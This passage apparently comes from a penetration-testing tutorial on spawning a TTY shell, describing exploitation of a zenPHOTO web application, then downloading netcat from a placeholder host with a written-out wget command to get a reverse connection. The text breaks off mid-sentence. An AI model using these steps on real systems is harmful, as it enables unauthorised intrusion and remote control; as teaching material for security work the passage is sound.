We have learned about different types of privilege escalation already. Now, let's look at some examples on how to get a TeleTYpewriter (TTY) shell on this system. A TTY showcases a simple text output environment that allows us to type in commands and get output.
Spawning a TTY shell
How to do it...
- Let's look at a simple example. Here, we have a web application running zenPHOTO:
- zenPHOTO already has a public exploit running, which we can use to get access to a limited shell:
- Since this is a limited shell, we will try to escape it and get a reverse connection by uploading netcat on the system and then using netcat to gain a back-connect:
wget x.x.x.x/netcat -o /tmp/netcat
The output of running the preceding...